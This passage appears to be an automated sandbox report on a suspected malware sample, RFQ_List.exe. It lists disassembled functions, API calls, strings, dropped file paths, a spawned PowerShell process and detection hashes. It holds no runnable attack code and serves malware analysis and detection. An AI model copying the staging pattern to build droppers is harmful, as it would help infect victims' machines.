API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58

Function 00401D56 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D59
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
ReleaseDC.USER32(?,00000000), ref: 00401D86
CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1

Strings

Tahoma, xrefs: 00401DB7

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Tahoma
API String ID: 3808545654-3580928618
Opcode ID: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
Opcode Fuzzy Hash: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE

Function 00402840 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
GlobalFree.KERNEL32(?), ref: 004028E9
GlobalFree.KERNEL32(00000000), ref: 004028FC
CloseHandle.KERNEL32(?), ref: 00402914
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
Instruction ID: bba7bc1bbfa323a43f965ccea5c6d76089a10f976336bb633e0bf1cd6394a54a
Opcode Fuzzy Hash: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
Instruction Fuzzy Hash: E1219E72800114BBDF216FA5CE49D9E7EB9EF09324F24023AF550762E1C7795E41DBA8

Function 00402537 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,Copy to C:\Users\Public\Desktop\Bardehvalers.unw,000000FF,C:\Windows\resources\0809\gildes.lak,00000400,?,?,00000021), ref: 00402583
lstrlenA.KERNEL32(C:\Windows\resources\0809\gildes.lak,?,?,Copy to C:\Users\Public\Desktop\Bardehvalers.unw,000000FF,C:\Windows\resources\0809\gildes.lak,00000400,?,?,00000021), ref: 0040258E

Strings

C:\Windows\resources\0809\gildes.lak, xrefs: 00402552, 00402575, 00402589, 004025D5
Copy to C:\Users\Public\Desktop\Bardehvalers.unw, xrefs: 0040257C

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Windows\resources\0809\gildes.lak$Copy to C:\Users\Public\Desktop\Bardehvalers.unw
API String ID: 3109718747-4159403888
Opcode ID: 124bc1b9933efb7c56f85c679ca816716a721c48624739d77ea3ba7bc55c233f
Instruction ID: 733a5b8a3421de7103486a8e2fd1e7248c9e7ae9f3a69bb90da27b1d5488d101
Opcode Fuzzy Hash: 124bc1b9933efb7c56f85c679ca816716a721c48624739d77ea3ba7bc55c233f
Instruction Fuzzy Hash: E011EB71A01205BBDB10AF718F49A9F3265DF44754F24403BF501F61C2EAFC9D91566D

Function 00401CFA Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D00
GetClientRect.USER32(00000000,?), ref: 00401D0D
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
DeleteObject.GDI32(00000000), ref: 00401D4B

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 1a74f2179679fb2cdf553b0348ac08105bc06b0e0a733d0f1a12f3a9490ff99b
Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
Opcode Fuzzy Hash: 1a74f2179679fb2cdf553b0348ac08105bc06b0e0a733d0f1a12f3a9490ff99b
Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38

Function 00404970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
wsprintfW.USER32 ref: 00404A1A
SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D

Strings

%u.%u%s%s, xrefs: 004049FB

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
Opcode Fuzzy Hash: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8

Function 00405A09 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A0F
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A19
lstrcatW.KERNEL32(?,0040A014), ref: 00405A2B

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A09

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
Instruction ID: 6c4fcacab342d11fcc3e0291a3358bee332e4b98312e181ff459d3a43eef6c86
Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
Instruction Fuzzy Hash: E4D0A771101D306AC211EB548C04DDF72ACAE45344381007BF502B30E1CB7C1D618BFE

Function 00402D8A Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
GetTickCount.KERNEL32 ref: 00402DBB
CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C

Function 00403809 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,004037E1,004035F6,?), ref: 00403823
GlobalFree.KERNEL32(?), ref: 0040382A

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403809

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3081826266
Opcode ID: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
Instruction ID: 1a021970d57ae41c51ef9a97853206db199f5c9852ffd88fd16926185a7b9e14
Opcode Fuzzy Hash: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
Instruction Fuzzy Hash: 72E0EC3350162097C7216F55BD08B6AB7ACAF4DB22F4584BAE880BB2608B745C428BD8

Function 00405A55 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RFQ_List.exe,C:\Users\user\Desktop\RFQ_List.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A5B
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RFQ_List.exe,C:\Users\user\Desktop\RFQ_List.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A6B

Strings

C:\Users\user\Desktop, xrefs: 00405A55

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
Instruction ID: bc07cd37d8a58f62a2b9a6dad95115890aa924a9f687d43278fd1307a4d4e217
Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
Instruction Fuzzy Hash: 7ED05EB2400D209AD312A714DC84DAF77ACEF1530074A446BF441A31A0D7785D918AA9

Function 00405B8F Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1

Memory Dump Source

Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9

Analysis Process: powershell.exePID: 6840, Parent PID: 6588COMMON

Executed Functions

Function 0782CAB6 Relevance: 8.1, Strings: 5, Instructions: 1844COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0782D490
4'^q, xrefs: 0782DF61
4'^q, xrefs: 0782D49C
4'^q, xrefs: 0782C6FA
4'^q, xrefs: 0782C79E

Memory Dump Source

Source File: 00000001.00000002.2338701963.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7820000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q
API String ID: 0-4202989938
Opcode ID: f74c5f515b7b529cb24e8169b5f5db8619abf0c079b12d1a9ede076b71327669
Instruction ID: faf1aaf8795a0018cf31a0f60e8ca3449a781fe8f81618bfb06a1847e58829ad
Opcode Fuzzy Hash: f74c5f515b7b529cb24e8169b5f5db8619abf0c079b12d1a9ede076b71327669
Instruction Fuzzy Hash: 40035FB4A00228DFD724DF54C854BAABBB2BF85305F50C5A9D909AB780CB35ED86CF51

Function 04CADE58 Relevance: .7, Instructions: 713COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2331900291.0000000004CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4ca0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46d10e47b853c4e0c0cddad4b152838589f390408a55f34325416123c56b3436
Instruction ID: 1dcdbb65dc764b84985153f6def621685e6603b5483b01ac94a6881a5684a2b4
Opcode Fuzzy Hash: 46d10e47b853c4e0c0cddad4b152838589f390408a55f34325416123c56b3436
Instruction Fuzzy Hash: C6529F30B0021ACFDB14DF65C8547ADBBB3AF85308F148599D849E7351EB34AA96CF92

Function 07823020 Relevance: 31.3, Strings: 24, Instructions: 1318COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07823F8D
4'^q, xrefs: 07823179
4'^q, xrefs: 07823A13
4'^q, xrefs: 078234C6
4'^q, xrefs: 07823584
tP^q, xrefs: 07823310
4'^q, xrefs: 07823620
4'^q, xrefs: 0782362C
4'^q, xrefs: 07823F81
4'^q, xrefs: 078238B7
4'^q, xrefs: 0782381B
4'^q, xrefs: 0782395F
4'^q, xrefs: 07823D13
4'^q, xrefs: 0782380F
4'^q, xrefs: 078236C8
4'^q, xrefs: 078236D4
tP^q, xrefs: 07823304
4'^q, xrefs: 078234BA
4'^q, xrefs: 07823A07
4'^q, xrefs: 07823578
4'^q, xrefs: 078238C3
4'^q, xrefs: 0782396B
4'^q, xrefs: 07823185
4'^q, xrefs: 07823D1F

Memory Dump Source

Source File: 00000001.00000002.2338701963.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7820000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
API String ID: 0-306622666
Opcode ID: 5632719f04f080b1c25f7dc5dad119212eee76d0345cea42987e6db9fae9cb66
Instruction ID: f2b3cddb355fc81b19aca109fa94a5a75742d5db305144b2baf86e51d34a6a3d
Opcode Fuzzy Hash: 5632719f04f080b1c25f7dc5dad119212eee76d0345cea42987e6db9fae9cb66
Instruction Fuzzy Hash: 9BB2C1B0B003148FDB14CF98C455BAABBE2AB95305F50C859D909AF785CB76EC86CB91

Function 091016C8 Relevance: 19.5, Strings: 15, Instructions: 704COMMON

Download Yara Rule

Strings

$^q, xrefs: 09101B08
4'^q, xrefs: 09101809
$^q, xrefs: 09101B27
4'^q, xrefs: 091019F6
4'^q, xrefs: 091017FD
4'^q, xrefs: 091019EA
$^q, xrefs: 09101AEC
tP^q, xrefs: 09101B6C
$^q, xrefs: 09101B33
$^q, xrefs: 0910178F
tP^q, xrefs: 09101B78
$^q, xrefs: 09101AD0
$^q, xrefs: 0910176E
$^q, xrefs: 0910179F
$^q, xrefs: 09101B14

Memory Dump Source

Source File: 00000001.00000002.2349023585.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9100000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-1262107880
Opcode ID: bb54a520f5bfb59dac836d99b8117d6b2198a84cbb3417e8239667aba7c83316
Instruction ID: 9a944fa5accd75695e10ea462b72a274544d4afcaa8ef0dd35dfcd36c5e72656
Opcode Fuzzy Hash: bb54a520f5bfb59dac836d99b8117d6b2198a84cbb3417e8239667aba7c83316
Instruction Fuzzy Hash: 8E32F371B04204EFCB188F68C465AAABBF2AFC8315F14C46AE8059F391DB76DD45CB91

Function 078233A4 Relevance: 13.3, Strings: 10, Instructions: 830COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0782395F
4'^q, xrefs: 07823D13
4'^q, xrefs: 07823620
4'^q, xrefs: 078236C8
4'^q, xrefs: 0782380F
4'^q, xrefs: 078234BA
4'^q, xrefs: 07823A07
4'^q, xrefs: 07823F81
4'^q, xrefs: 07823578
4'^q, xrefs: 078238B7

Memory Dump Source

Source File: 00000001.00000002.2338701963.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7820000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
API String ID: 0-518715366
Opcode ID: ed6e932a8debbab81ef0e7b2c91aad64e43d95bf589ae8693dbfefef72e2b08f
Instruction ID: 8404f85aa690b8aa2d8db669078af38aeed7d968a9ce29f8e673a8f21c064a66
Opcode Fuzzy Hash: ed6e932a8debbab81ef0e7b2c91aad64e43d95bf589ae8693dbfefef72e2b08f
Instruction Fuzzy Hash: 7472A0B0A00314DFDB14CF54C455BAABBB2BB95309F60C859D909AF781CB76EC86CB91

Function 07821148 Relevance: 8.1, Strings: 6, Instructions: 625COMMON

Download Yara Rule

Strings

4'^q, xrefs: 078214B6
4'^q, xrefs: 07821744
4'^q, xrefs: 07821738
4'^q, xrefs: 078214C2
tP^q, xrefs: 078211DF
tP^q, xrefs: 078211D3

Memory Dump Source

Source File: 00000001.00000002.2338701963.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7820000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
